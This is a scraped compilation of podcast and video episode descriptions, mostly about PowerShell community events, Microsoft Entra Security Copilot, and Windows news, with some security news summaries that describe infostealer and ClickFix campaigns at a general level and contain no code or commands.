Troubleshoot identity issues, investigate risky users and apps, and optimize Conditional Access policies using natural language—with built-in AI from Microsoft Security Copilot in Microsoft Entra. Instead of switching between logs, PowerShell, and spreadsheets, Security Copilot centralizes insights for faster, more focused action. Resolve compromised accounts, uncover ownerless or high-risk apps, and tighten policy coverage with clear insights, actionable recommendations, and auto-generated policies. Strengthen security posture and reclaim time with a smarter, more efficient approach powered by Security Copilot. Diana Vicezar, Microsoft Entra Product Manager, shares how to streamline investigations and policy management using AI-driven insights and automation. ► QUICK LINKS: 00:00 - Microsoft Entra with Security Copilot 01:26 - Conditional Access Optimization Agent 03:35 - Investigate risky users 05:49 - Investigate risky apps 07:34 - Personalized security posture recommendations 08:20 - Wrap up ► Link References Check out https://aka.ms/SecurityCopilotAgentsinMicrosoftEntra ► Unfamiliar with Microsoft Mechanics? As Microsoft's official video series for IT, you can watch and share valuable content and demos of current and upcoming tech from the people who build it at Microsoft. • Subscribe to our YouTube: https://www.youtube.com/c/MicrosoftMechanicsSeries • Talk with other IT Pros, join us on the Microsoft Tech Community: https://techcommunity.microsoft.com/t5/microsoft-mechanics-blog/bg-p/MicrosoftMechanicsBlog • Watch or listen from anywhere, subscribe to our podcast: https://microsoftmechanics.libsyn.com/podcast ► Keep getting this insider knowledge, join us on social: • Follow us on Twitter: https://twitter.com/MSFTMechanics • Share knowledge on LinkedIn: https://www.linkedin.com/company/microsoft-mechanics/ • Enjoy us on Instagram: https://www.instagram.com/msftmechanics/ • Loosen up with us on TikTok: https://www.tiktok.com/@msftmechanics
In this special live episode recorded amidst the rain-soaked streets of Malmö duringPSConfEU 2025, host Andrew Pla brings us a vibrant, multi-guest edition of the PowerShell Podcast. From impromptu bar chats to in-depth discussions on PowerShell modules, CI/CD pipelines, career growth, and community culture, this episode captures the heart of the PowerShell community in full force. Hear from speakers, first-time attendees, longtime community contributors, and PowerShell legends as they share their stories, projects, career journeys, favorite sessions, and the human side of tech. Guests: Harm Veenstra (PowerShellIsFun, MVP and Legend) Constantin Hager (PS Framework user & Inn-Salzach PowerShell Group organizer) Thomas Hadin (Swedish consultant, Discord regular) James Ruskin (Chocolatey engineer, bigtime PowerSheller, kind and smart) Emanuel Palm (Microsoft MVP and PSConfEU speaker) Suresh "SK" Krishnan (IAM pro & PowerShell podcast superfan) Topics Covered: Favorite PSConfEU 2025 sessions and key takeaways GitHub Actions & GitHub Apps deep dive Lightning talks & community demo formats User group organizing and mentoring new speakers Tools: PS Framework, Spectre.Console, AI Shell, ModuleBuilder PowerShell remoting, PSDefaultParameterValues, and CI pipelines Career development insights, perspective shifts, and personal growth Building friendships and networks in the PowerShell community Highlights: “There's no magic” – a recurring theme reminding listeners to understand what they're running. Reflections on how empathy and perspective can transform your IT career. A shoutout to the PowerShell Discord community and lesser-known contributors like weq and Chris Dent. Real stories of overcoming stage fright, pushing past visa issues, and finding belonging through tech. Links: https://discord.gg/pdq https://psconf.eu https://andrewpla.tech/links Watch PowerShell Wednesday: https://www.youtube.com/playlist?list=PL1mL90yFExsix-L0havb8SbZXoYRPol0B PSConfEU 2025 sessions: https://www.youtube.com/watch?v=9CJWhWdbTGU&list=PLDCEho7foSoo6tc8iNDSrxp27dG_gtm6g The PowerShell Podcast Hub: https://pdq.com/the-powershell-podcast The PowerShell Podcast on YouTube: https://youtu.be/RoVlp5XmXBc
Today we are joined by Selena Larson, Threat Researcher at Proofpoint, and co-host of Only Malware in the Building, as she discusses their work on "Amatera Stealer - Rebranded ACR Stealer With Improved Evasion, Sophistication." Proofpoint researchers have identified Amatera Stealer, a rebranded and actively developed malware-as-a-service (MaaS) variant of the former ACR Stealer, featuring advanced evasion techniques like NTSockets for stealthy C2 communication and WoW64 Syscalls to bypass user-mode defenses. Distributed via ClearFake web injects and the ClickFix technique, Amatera leverages multilayered PowerShell loaders, blockchain-based hosting, and creative social engineering to compromise victims. With enhanced capabilities to steal browser data, crypto wallets, and other sensitive files, Amatera poses a growing threat in the wake of disruptions to competing stealers like Lumma. Complete our annual audience survey before August 31. The research can be found here: Amatera Stealer: Rebranded ACR Stealer With Improved Evasion, Sophistication Learn more about your ad choices. Visit megaphone.fm/adchoices
Today we are joined by Selena Larson, Threat Researcher at Proofpoint, and co-host of Only Malware in the Building, as she discusses their work on "Amatera Stealer - Rebranded ACR Stealer With Improved Evasion, Sophistication." Proofpoint researchers have identified Amatera Stealer, a rebranded and actively developed malware-as-a-service (MaaS) variant of the former ACR Stealer, featuring advanced evasion techniques like NTSockets for stealthy C2 communication and WoW64 Syscalls to bypass user-mode defenses. Distributed via ClearFake web injects and the ClickFix technique, Amatera leverages multilayered PowerShell loaders, blockchain-based hosting, and creative social engineering to compromise victims. With enhanced capabilities to steal browser data, crypto wallets, and other sensitive files, Amatera poses a growing threat in the wake of disruptions to competing stealers like Lumma. Complete our annual audience survey before August 31. The research can be found here: Amatera Stealer: Rebranded ACR Stealer With Improved Evasion, Sophistication Learn more about your ad choices. Visit megaphone.fm/adchoices
In this episode, recorded live at PSConfEU, Andrew catches up with some of the PowerShell team from Microsoft to talk all things PowerShell—from AIShell to PSResourceGet to the future of DSC and OpenSSH. First up is Steven Bucher, Product Manager on the PowerShell team, who discusses the massive scale of PowerShell usage, the state of PowerShell 7, and the team's focus on security and reliability. He also gives an exciting walkthrough of AIShell and how it's helping users stay in the terminal while getting AI-driven help, error resolution, and integration with providers like Azure OpenAI and AI Foundry. Then we hear from Anam, a software engineer working on PSResourceGet, PowerShell Gallery, and security. She shares details on the rewrite of PowerShellGet, performance improvements, and new features like container registry support. She also dives into Microsoft's Artifact Registry (MAR) and offers her take on coding as a creative, artistic endeavor. Lastly, Tess joins the conversation to talk about OpenSSH and Desired State Configuration (DSC). She highlights the native cross-platform capabilities of DSC v3, its decoupling from PowerShell, and the move toward supporting resource development in languages like Python. Tess also shares the significance of SSH server availability in Windows Server 2025 and reflects on her open-source journey and love of outdoor sports. Whether you're managing packages, remoting with SSH, exploring AI integrations, or just want to know more about some of the people behind PowerShell, this episode delivers valuable insights from the team building the tools you use. Links and Mentions: https://www.linkedin.com/in/anamnavied/ https://www.linkedin.com/in/tess-gauthier-a43a368a/ https://www.linkedin.com/in/stevenabucher/ https://andrewpla.tech/links https://github.com/PowerShell/PowerShell https://github.com/PowerShell/AIShell https://github.com/PowerShell/PSResourceGet https://github.com/PowerShell/Win32-OpenSSH https://github.com/microsoft/DSC The PowerShell Podcast on YouTube: https://youtu.be/F4mVUHinjf4 The PowerShell Podcast: https://pdq.com/the-powershell-podcast Guests: Stephen Bucher – Product Manager II on the PowerShell Team Anam Navied – Software Engineer 2 @ Microsoft Tess Gauthier – Software Engineer @ Microsoft | OpenSSH
Link to episode page This week's Cyber Security Headlines – Week in Review is hosted by Rich Stroffolino with guest Bil Harmer, operating partner and CISO, Craft Ventures. Check out Bil's page, KillSwitchAdvisory. Thanks to our show sponsor, ThreatLocker Alert fatigue, false positives, analyst burnout—you know the drill. What if you could stop threats before they run? ThreatLocker gives CISOs what they've been asking for: real control at the execution layer. Only approved apps, scripts, and executables run. Period. Known-good is enforced. Everything else? Denied by default. Ringfencing and storage control keep even trusted tools in their lane—so PowerShell doesn't become a weapon. And yes—it works at scale. Granular policies. Fast rollout. Built for modern infrastructure. You don't need more alerts. You need fewer chances for malware to make a move. ThreatLocker helps you flip the model—from detect-and-respond… to deny-and-verify. Go to ThreatLocker.com/CISO to schedule your free demo and close the last gap in your Zero Trust strategy, before it's exploited. All links and the video of this episode can be found on CISO Series.com
Hazel welcomes back Ryan Fetterman from the SURGe team to explore his new research on how large language models (LLMs) can assist those who work in security operations centers to identify malicious PowerShell scripts. From teaching LLMs through examples, to using retrieval-augmented generation and fine-tuning specialized models, Ryan walks us through three distinct approaches, with surprising performance gains.
In this episode of the PowerShell Podcast, host Andrew Pla reports live from PowerShell Conference Europe 2025 in Malmö, Sweden. With energy high and community engagement stronger than ever, Andrew chats with key figures shaping the PowerShell ecosystem. First, we hear from Gael Colas, organizer of PSConfEU and longtime community advocate, who discusses the significance of the conference and its international impact. Gael reflects on the challenges of organizing a multi-country event and the magic that happens when the community comes together in person. Later, Andrew connects with Stein Petersen, a speaker at PSConfEU. Stein shares insights into his talk on mental health, psychological safety, and building human-centric tech teams. Alongside his co-speaker, licensed therapist Tracy Sewell, they tackle burnout prevention and emotional resilience in the workplace. The discussion sheds light on the intersection between mental well-being and professional success in IT. This episode captures the unique mix of technical enthusiasm and human connection that defines the PowerShell community. Whether you're coding, coaching, or just trying to survive burnout, there's something here for you. Recorded on location at PowerShell Conference Europe 2025. Links & Bio: https://psconf.eu https://andrewpla.tech/links https://www.linkedin.com/in/steinpetersen/ https://gaelcolas.com https://synedgy.com https://discord.gg/pdq The PowerShell Podcast on YouTube: https://youtu.be/paB3R1uA8jw The PowerShell Podcast: https://pdq.com/the-powershell-podcast Gael Colas Gael is the founder and director of SynEdgy Limited, a consulting company in the DevOps, Azure and PowerShell automation space, helping companies bringing agility in their infrastructure management and operations. SynEdgy is also behind the PowerShell Conference Europe (PSConfEU), PSDayUK and contributes to many other user groups and events of the community. In his spare time, Gael is a member of the PowerShell Working Groups, DSC Community committee member, and recipient of the Microsoft MVP award. Stein Petersen Stein is a cloud architect and passionate community contributor focused on mental health in IT. He is committed to fostering psychological safety, resilience, and emotional intelligence within tech teams.
In this episode of the PowerShell Podcast, we're joined by Steven Judd and Gilbert Sanchez, two active contributors and speakers in the PowerShell community. We talk about the Dos and Don'ts of PowerShell. We cover topics like documentation, testing, community, how you should view yourself in your growth, and even get some top tips on logging from those who have done PowerShell at the highest levels. Key Topics Covered: How community support leads to career breakthroughs Learning through teaching and presenting at conferences Overcoming nerves and imposter syndrome as new speakers The value of async learning and accountability through PowerShell Wednesdays Steven's PowerShell journey from System Admin to cybersecurity educator Gilbert's insights on mentorship, blogging, and personal development Embracing humility and finding joy in collaboration Whether you're just getting started or looking to deepen your PowerShell journey, this episode is a celebration of curiosity, courage, and community.
This week, we sit down with Anthony Howell, better known as The PoSh Wolf, for an inspiring and entertaining conversation about PowerShell, community, and creativity. From his early days in a two-person IT department to speaking at PowerShell Summit, Anthony shares how passion, persistence, and curiosity have fueled his journey. He dives into his creative use of PowerShell for managing game servers and even building a Discord bot, proving that automation isn't just for enterprise tasks. We explore how side projects can grow into real skills, the value of sharing in the community, and how embracing mistakes makes us all better. Anthony also gives insights into using .NET in PowerShell, learning Go, and building resilient systems for fun and work. Bio: Anthony Howell is a proud father, lucky husband, and passionate software builder. Since starting his IT career in 2009 as a helpdesk technician, he's followed his drive for automation from scripting sysadmin tasks in PowerShell to tackling DevOps and site reliability challenges. Known for always having a process improvement idea, Anthony shares insights from his journey to help others build smarter, more efficient systems. What You'll Learn: How Anthony got started with PowerShell and his first Summit experience Creative PowerShell use cases like Discord bots and game server management Lessons from mistakes and the power of testing Transitioning from PowerShell to .NET and even Go The importance of community and continuing to ask questions Links & Resources: https://www.linkedin.com/in/theposhwolf/ https://discord.gg/pdq https://theposhwolf.com/ https://andrewpla.tech/links Check out PDQ: https://pdq.com/podcast https://www.powershellgallery.com/packages/powershell-yaml/0.4.12 The PowerShell Podcast on YouTube: https://youtu.be/tOH5FXn0IhU
SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
Extracting With pngdump.py Didier extended his pngdump.py script to make it easier to extract additional data appended to the end of the image file. https://isc.sans.edu/diary/Extracting%20With%20pngdump.py/32022 16 React Native Packages for GlueStack Backdoored Overnight 16 npm packages with over a million weekly downloads between them were compromised. The compromised packages include a remote admin tool that was seen before in similar attacks. https://www.aikido.dev/blog/supply-chain-attack-on-react-native-aria-ecosystem Atomic MacOS Stealer Exploits Clickfix MacOS users are now also targeted by fake captchas, tricking users into running exploit code. https://www.cloudsek.com/blog/amos-variant-distributed-via-clickfix-in-spectrum-themed-dynamic-delivery-campaign-by-russian-speaking-hackers Microsoft INETPUB Script Microsoft published a simple PowerShell script to restore the inetpub folder in case you removed it by mistake. https://www.powershellgallery.com/packages/Set-InetpubFolderAcl/1.0
Forecast = Stormy with a chance of TikTok malware showers—exploit scoring systems hot, but patch management outlook remains partly cloudy. Welcome to Storm⚡️Watch! In this episode, we're diving into the current state of cyber weather with a mix of news, analysis, and practical insights. This week, we tackle a fundamental question: are all exploit scoring systems bad, or are some actually useful? We break down the major frameworks: **CVSS (Common Vulnerability Scoring System):** The industry standard for assessing vulnerability severity, CVSS uses base, temporal, and environmental metrics to give a comprehensive score. It's widely used but has limitations—especially since it doesn't always reflect real-world exploitability. **Coalition Exploit Scoring System (ESS):** This system uses AI and large language models to predict the likelihood that a CVE will be exploited in the wild. ESS goes beyond technical severity, focusing on exploit availability and usage probabilities, helping organizations prioritize patching with better accuracy than CVSS alone. **EPSS (Exploit Prediction Scoring System):** EPSS is a data-driven approach that estimates the probability of a vulnerability being exploited, using real-world data from honeypots, IDS/IPS, and more. It updates daily and helps teams focus on the most urgent risks. **VEDAS (Vulnerability & Exploit Data Aggregation System):** VEDAS aggregates data from over 50 sources and clusters vulnerabilities, providing a score based on exploit prevalence and maturity. It's designed to help teams understand which vulnerabilities are most likely to be actively exploited. **LEV/LEV2 (Likely Exploited Vulnerabilities):** Proposed by NIST, this metric uses historical EPSS data to probabilistically assess exploitation, helping organizations identify high-risk vulnerabilities that might otherwise be missed. **CVSS BT:** This project enriches CVSS scores with real-world threat intelligence, including data from CISA KEV, ExploitDB, and more. It's designed to help organizations make better patching decisions by adding context about exploitability. Next, we turn our attention to a troubling trend: malware distribution via TikTok. Attackers are using AI-generated videos, disguised as helpful software activation tutorials, to trick users into running malicious PowerShell commands. This “ClickFix” technique has already reached nearly half a million views. The malware, including Vidar and StealC, runs entirely in memory, bypassing traditional security tools and targeting credentials, wallets, and financial data. State-sponsored groups from Iran, North Korea, and Russia have adopted these tactics, making it a global concern. For employees, the takeaway is clear: never run PowerShell commands from video tutorials, and always report suspicious requests to IT. For IT teams, consider disabling the Windows+R shortcut for standard users, restrict PowerShell execution, and update security awareness training to include social media threats. We also highlight the latest from Censys, VulnCheck, runZero, and GreyNoise—industry leaders providing cutting-edge research and tools for vulnerability management and threat intelligence. Don't miss GreyNoise's upcoming webinar on resurgent vulnerabilities and their impact on organizational security. And that's a wrap for this episode! We will be taking a short break from Storm Watch for the summer. We look forward to bringing more episodes to you in the fall! Storm Watch Homepage >> Learn more about GreyNoise >>
In this episode of the PowerShell Podcast, we take a detour from our typical PowerShell conversations to explore the fascinating world of game hacking with backend services developer Mateus Pimentel. Mateus shares his journey from crafting bots for MMORPGs to reverse engineering games and ultimately working in online services for a major gaming company.We discuss his early experiences hacking Tibia, how he overcame being hacked himself as a kid, and how those formative experiences shaped his approach to software development and cybersecurity. Mateus also dives into powerful learning experiences from hacking games, participating in Capture the Flag competitions, and avoiding the dark paths that lure many curious technologists. This episode is a compelling exploration of hacking culture, ethics, and personal transformation. Topics covered: From game hacking to working at a gaming company Mateus' early adventures reverse-engineering Tibia Lessons learned from being hacked as a kid Ethical hacking, personal growth, and career evolution The overlap between game hacking and cybersecurity Capture the Flag (CTF) competitions and their career value Understanding system protocols and reverse engineering Reflections on following your curiosity and avoiding burnout Notable quote: “Follow your passion. If it's fun, you'll learn 10 times faster.” Bio and Links: Mateus Pimentel is a software developer with a passion for software architecture, game modding and solving complex problems. From reverse engineering MMORPGs as a teenager to helping secure one of the gaming industry's most ambitious projects at major gaming company, Mateus has cultivated deep technical skills grounded in a strong ethical framework. His journey from underground hacker to professional developer offers a unique and inspiring perspective on how curiosity and integrity can guide a meaningful career in tech. Follow Mateus on LinkedIn: https://www.linkedin.com/in/pimentelmateus/ Connect with Andrew: https://andrewpla.tech/links Catch PowerShell Wednesdays weekly at 2 PM EST on discord.gg/pdq The PowerShell Podcast hub: https://pdq.com/the-powershell-podcast Darza's Dominion Hacked: https://www.youtube.com/watch?v=ipqge4aJt3U Mystera Reborn Hacked: https://youtu.be/Gg6owdR_7h8?si=1Uk0a8RW9czs0TCm Using Remote Vision to watch a Player Battle: https://www.youtube.com/watch?v=poDkWlR-1ks Fractured Online Gold Machine: https://youtu.be/EIHJBdrr0Ac?si=Wis9DGinI5EKuN0O The PowerShell Podcast Hub: https://pdq.com/the-powershell-podcast The PowerShell Podcast on YouTube: https://youtu.be/8cxtg4QQjZQ
In this episode of the PowerShell Podcast, we welcome back Justin Grote, a Microsoft MVP and open-source powerhouse, for an in-depth and fast-paced conversation. Fresh off his PowerShell Wednesday presentation, Justin shares the thinking behind his latest innovations, including the creation of the high-performance ExcelFast module and his evangelism for dev containers and modern development workflows. Key topics in this episode include: Getting the most from VS Code – Justin shares power-user tips, favorite settings, and the evolution of his 1,000-line configuration file. GitHub Copilot and real-world developer productivity – How Justin's approach to AI tooling shifted after experiencing measurable value in his PowerShell workflows. Dev containers and runtime containers – A detailed breakdown of the difference, practical use cases, and how they transform collaboration, onboarding, and consistency. Excel Fast – A brand-new module optimized for high-performance reading, writing, and streaming of large Excel and CSV datasets, developed with dev containers from day one. Open-source contributions to PowerShell – Including enhanced logging for Invoke-RestMethod and building a dev container for the PowerShell repo itself. PowerShell Conf EU previews – From a 90-minute VS Code optimization deep dive to a hands-on runspaces lab with GitHub Codespaces integration. This episode is packed with practical advice, philosophy on tooling, and Justin's trademark blend of performance focus and community-first thinking. Whether you're a seasoned developer or looking to up your scripting game, you'll walk away with new ideas and resources to explore. Guest Bio – Justin Grote Justin Grote is a Microsoft MVP, PowerShell advocate, and open-source contributor with a deep focus on automation, performance, and developer productivity. Known for tools like ModuleFast and his work improving PowerShell workflows, Justin blends real-world experience with a passion for teaching and sharing. Whether he's optimizing VS Code, contributing to the PowerShell repo, or speaking at global conferences, Justin empowers the community with practical solutions and thoughtful insight. Links: Find Justin on GitHub, BlueSky, or on Discord (@JustinGrote): https://github.com/JustinGrote Try out ExcelFast: https://github.com/JustinGrote/ExcelFast PSConfEU Announcement: https://www.linkedin.com/feed/update/urn:li:activity:7328093268225806337/ Create Dev Container Docs: https://code.visualstudio.com/docs/devcontainers/create-dev-container SecretManagement.DpapiNG: https://github.com/jborean93/SecretManagement.DpapiNG Connect with Andrew on Socials: https://andrewpla.tech/links Catch PowerShell Wednesdays weekly at 2 PM EST on discord.gg/pdq The PowerShell Podcast hub: https://pdq.com/the-powershell-podcast The PowerShell Podcast on YouTube: https://youtu.be/dHbWFUyUaOE
Agentic AI is the theme of the show this year, and this time its multi-agent with orchestration! But first, we need to discuss the protestors. Paul and Richard have stories. So many stories! Build 2025 New Microsoft 365 Copilot features are rolling out now because it's a day that ends in y Tuning is the unexpected Build Bingo center square term - rolling out to agents GitHub Copilot is open source in VS Code, more Win32 app support improvements, no more fees in Microsoft Store A shift in making Windows 11 the best place for developers - some things said, some left unsaid Edge gets new AI features too of course New native app capabilities in Windows App SDK, React Native And, pre-Build, 50 million Visual Studio users Copilot for consumers does image generation now. Fun tip: You can Minecraft-ize photos OpenAI has a coding agent too, obviously And OpenAI is buying Jony Ive! Windows Administrator Protection is coming soon - And not just for businesses. This feels very much like the firewall in XP SP2, it's going to be disruptive New 24H2 features in Release Preview: New text actions in Click to Do, a lot more New 24H2 features in Dev and Beta: AI actions in File Explorer, Advanced Settings, Search improvements, more New 23H2 features, Windows 10 features in Release Preview Surface Laptop Studio RIP Calendar companion app for Windows 11/M365 Microsoft may finally put the Teams antitrust issue in the EU behind Xbox Fortnite returns to the Apple App Store Apple blocked it first, Epic complained to judge And Microsoft files a legal motion against Apple and for Epic Games Qualcomm job listing confirms Xbox plans to some degree What happens when you combine Qualcomm NPU with Nvidia GPU? Xbox May Update arrives and it's a big one Retro Classic Games for Xbox Game Pass Game Bar updates, Edge Game Assist, GeForce now etc. on PC Custom Xbox gift cards More streaming of your own games Hellblade II is coming from Xbox to PS5 Many more games coming to Xbox Game Pass across platforms Tips and Picks App pick of the week: You can try Microsoft's command line editor now Game pick of the week: Doom: The Dark Ages RunAs Radio this week: PowerShell 7.5 and DSC 3.0.0 with Jason Helmick Brown liquor pick of the week: Tamnavulin Sherry Cask Hosts: Leo Laporte, Paul Thurrott, and Richard Campbell Download or subscribe to Windows Weekly at https://twit.tv/shows/windows-weekly Check out Paul's blog at thurrott.com The Windows Weekly theme music is courtesy of Carl Franklin. Join Club TWiT for Ad-Free Podcasts! Support what you love and get ad-free shows, a members-only Discord, and behind-the-scenes access. Join today: https://twit.tv/clubtwit Sponsors: spaceship.com/twit uscloud.com
Agentic AI is the theme of the show this year, and this time its multi-agent with orchestration! But first, we need to discuss the protestors. Paul and Richard have stories. So many stories! Build 2025 New Microsoft 365 Copilot features are rolling out now because it's a day that ends in y Tuning is the unexpected Build Bingo center square term - rolling out to agents GitHub Copilot is open source in VS Code, more Win32 app support improvements, no more fees in Microsoft Store A shift in making Windows 11 the best place for developers - some things said, some left unsaid Edge gets new AI features too of course New native app capabilities in Windows App SDK, React Native And, pre-Build, 50 million Visual Studio users Copilot for consumers does image generation now. Fun tip: You can Minecraft-ize photos OpenAI has a coding agent too, obviously And OpenAI is buying Jony Ive! Windows Administrator Protection is coming soon - And not just for businesses. This feels very much like the firewall in XP SP2, it's going to be disruptive New 24H2 features in Release Preview: New text actions in Click to Do, a lot more New 24H2 features in Dev and Beta: AI actions in File Explorer, Advanced Settings, Search improvements, more New 23H2 features, Windows 10 features in Release Preview Surface Laptop Studio RIP Calendar companion app for Windows 11/M365 Microsoft may finally put the Teams antitrust issue in the EU behind Xbox Fortnite returns to the Apple App Store Apple blocked it first, Epic complained to judge And Microsoft files a legal motion against Apple and for Epic Games Qualcomm job listing confirms Xbox plans to some degree What happens when you combine Qualcomm NPU with Nvidia GPU? Xbox May Update arrives and it's a big one Retro Classic Games for Xbox Game Pass Game Bar updates, Edge Game Assist, GeForce now etc. on PC Custom Xbox gift cards More streaming of your own games Hellblade II is coming from Xbox to PS5 Many more games coming to Xbox Game Pass across platforms Tips and Picks App pick of the week: You can try Microsoft's command line editor now Game pick of the week: Doom: The Dark Ages RunAs Radio this week: PowerShell 7.5 and DSC 3.0.0 with Jason Helmick Brown liquor pick of the week: Tamnavulin Sherry Cask Hosts: Leo Laporte, Paul Thurrott, and Richard Campbell Download or subscribe to Windows Weekly at https://twit.tv/shows/windows-weekly Check out Paul's blog at thurrott.com The Windows Weekly theme music is courtesy of Carl Franklin. Join Club TWiT for Ad-Free Podcasts! Support what you love and get ad-free shows, a members-only Discord, and behind-the-scenes access. Join today: https://twit.tv/clubtwit Sponsors: spaceship.com/twit uscloud.com
Agentic AI is the theme of the show this year, and this time its multi-agent with orchestration! But first, we need to discuss the protestors. Paul and Richard have stories. So many stories! Build 2025 New Microsoft 365 Copilot features are rolling out now because it's a day that ends in y Tuning is the unexpected Build Bingo center square term - rolling out to agents GitHub Copilot is open source in VS Code, more Win32 app support improvements, no more fees in Microsoft Store A shift in making Windows 11 the best place for developers - some things said, some left unsaid Edge gets new AI features too of course New native app capabilities in Windows App SDK, React Native And, pre-Build, 50 million Visual Studio users Copilot for consumers does image generation now. Fun tip: You can Minecraft-ize photos OpenAI has a coding agent too, obviously And OpenAI is buying Jony Ive! Windows Administrator Protection is coming soon - And not just for businesses. This feels very much like the firewall in XP SP2, it's going to be disruptive New 24H2 features in Release Preview: New text actions in Click to Do, a lot more New 24H2 features in Dev and Beta: AI actions in File Explorer, Advanced Settings, Search improvements, more New 23H2 features, Windows 10 features in Release Preview Surface Laptop Studio RIP Calendar companion app for Windows 11/M365 Microsoft may finally put the Teams antitrust issue in the EU behind Xbox Fortnite returns to the Apple App Store Apple blocked it first, Epic complained to judge And Microsoft files a legal motion against Apple and for Epic Games Qualcomm job listing confirms Xbox plans to some degree What happens when you combine Qualcomm NPU with Nvidia GPU? Xbox May Update arrives and it's a big one Retro Classic Games for Xbox Game Pass Game Bar updates, Edge Game Assist, GeForce now etc. on PC Custom Xbox gift cards More streaming of your own games Hellblade II is coming from Xbox to PS5 Many more games coming to Xbox Game Pass across platforms Tips and Picks App pick of the week: You can try Microsoft's command line editor now Game pick of the week: Doom: The Dark Ages RunAs Radio this week: PowerShell 7.5 and DSC 3.0.0 with Jason Helmick Brown liquor pick of the week: Tamnavulin Sherry Cask Hosts: Leo Laporte, Paul Thurrott, and Richard Campbell Download or subscribe to Windows Weekly at https://twit.tv/shows/windows-weekly Check out Paul's blog at thurrott.com The Windows Weekly theme music is courtesy of Carl Franklin. Join Club TWiT for Ad-Free Podcasts! Support what you love and get ad-free shows, a members-only Discord, and behind-the-scenes access. Join today: https://twit.tv/clubtwit Sponsors: spaceship.com/twit uscloud.com
Agentic AI is the theme of the show this year, and this time its multi-agent with orchestration! But first, we need to discuss the protestors. Paul and Richard have stories. So many stories! Build 2025 New Microsoft 365 Copilot features are rolling out now because it's a day that ends in y Tuning is the unexpected Build Bingo center square term - rolling out to agents GitHub Copilot is open source in VS Code, more Win32 app support improvements, no more fees in Microsoft Store A shift in making Windows 11 the best place for developers - some things said, some left unsaid Edge gets new AI features too of course New native app capabilities in Windows App SDK, React Native And, pre-Build, 50 million Visual Studio users Copilot for consumers does image generation now. Fun tip: You can Minecraft-ize photos OpenAI has a coding agent too, obviously And OpenAI is buying Jony Ive! Windows Administrator Protection is coming soon - And not just for businesses. This feels very much like the firewall in XP SP2, it's going to be disruptive New 24H2 features in Release Preview: New text actions in Click to Do, a lot more New 24H2 features in Dev and Beta: AI actions in File Explorer, Advanced Settings, Search improvements, more New 23H2 features, Windows 10 features in Release Preview Surface Laptop Studio RIP Calendar companion app for Windows 11/M365 Microsoft may finally put the Teams antitrust issue in the EU behind Xbox Fortnite returns to the Apple App Store Apple blocked it first, Epic complained to judge And Microsoft files a legal motion against Apple and for Epic Games Qualcomm job listing confirms Xbox plans to some degree What happens when you combine Qualcomm NPU with Nvidia GPU? Xbox May Update arrives and it's a big one Retro Classic Games for Xbox Game Pass Game Bar updates, Edge Game Assist, GeForce now etc. on PC Custom Xbox gift cards More streaming of your own games Hellblade II is coming from Xbox to PS5 Many more games coming to Xbox Game Pass across platforms Tips and Picks App pick of the week: You can try Microsoft's command line editor now Game pick of the week: Doom: The Dark Ages RunAs Radio this week: PowerShell 7.5 and DSC 3.0.0 with Jason Helmick Brown liquor pick of the week: Tamnavulin Sherry Cask Hosts: Leo Laporte, Paul Thurrott, and Richard Campbell Download or subscribe to Windows Weekly at https://twit.tv/shows/windows-weekly Check out Paul's blog at thurrott.com The Windows Weekly theme music is courtesy of Carl Franklin. Join Club TWiT for Ad-Free Podcasts! Support what you love and get ad-free shows, a members-only Discord, and behind-the-scenes access. Join today: https://twit.tv/clubtwit Sponsors: spaceship.com/twit uscloud.com
At RSAC Conference 2025, the conversation with Rob Allen, Chief Product Officer at ThreatLocker, centered on something deceptively simple: making cybersecurity effective by making it manageable.During this on-location recap episode, Rob shares how ThreatLocker cut through the noise of flashy booths and AI buzzwords by focusing on meaningful, face-to-face conversations with customers and prospects. Their booth was an open, no-frills space—designed for real dialogue, not distractions. What caught people's attention, though, wasn't the booth layout—it was a live demonstration of a PowerShell-based attack using a rubber ducky device. It visually captured how traditional tools often miss malicious scripts and how ThreatLocker's controls shut it down immediately. That kind of simplicity, Rob explains, is the real differentiator.Zero Trust Is a Journey—But It Doesn't Have to Be ComplicatedOne key message Rob emphasizes is that true security doesn't come from piling on more tools. Too many organizations rely on overlapping detection and response solutions, which leads to confusion and technical debt. “If you have five different jackets and they're all winter coats, you're not prepared for summer,” Sean Martin jokes, reinforcing Rob's point that layers should be distinct, not redundant.ThreatLocker's approach simplifies Zero Trust by focusing on proactive control—limiting what can execute or communicate in the first place. Rob also points to the importance of vendor consolidation—not just from a purchasing standpoint but from an operational one. With ThreatLocker, multiple security capabilities are built natively into a single platform with one agent and one portal, avoiding the chaos of disjointed systems.From Technical Wins to Human ConnectionsThe conversation wraps with a reminder that cybersecurity isn't just about tools—it's about the people and community that make the work worthwhile. Rob, Marco Ciappelli, and Sean Martin reflect on their shared experiences around the event and even the lessons learned over a slice of Detroit-style pizza. While the crust may have been debatable, the camaraderie and commitment to doing security better were not.Learn more about ThreatLocker: https://itspm.ag/threatlocker-r974⸻Guest: Rob Allen, Chief Product Officer, ThreatLocker | https://www.linkedin.com/in/threatlockerrob/ResourcesLearn more and catch more stories from ThreatLocker: https://www.itspmagazine.com/directory/threatlockerLearn more and catch more stories from RSA Conference 2025 coverage: https://www.itspmagazine.com/rsac25______________________Keywords:sean martin, marco ciappelli, rob allen, cybersecurity, zero trust, threat prevention, powerShell, vendor consolidation, rsac2025, endpoint security, brand story, brand marketing, marketing podcast, brand story podcast______________________Catch all of our event coverage: https://www.itspmagazine.com/technology-and-cybersecurity-conference-coverageWant to tell your Brand Story Briefing as part of our event coverage? Learn More
What's new in PowerShell 7.5? Richard talks to Jason Helmick about the latest version of PowerShell. Jason talks about 7.5 being a version with plenty of community contributions and what that means for everyone. He also discusses 7.6, which will be released as a long-term support version of PowerShell synchronized with .NET 10. Then, on to Desired State Configuration 3.0.0, which makes DSC work effectively across platforms, with or without PowerShell itself! 7.5 is a great version - are you up to date?LinksPowerShell 7.5PowerShell on GitHubDesired State Configuration 3.0.0WinGet ConfigurationSystem Configuration Tools in WindowsRecorded April 4, 2025
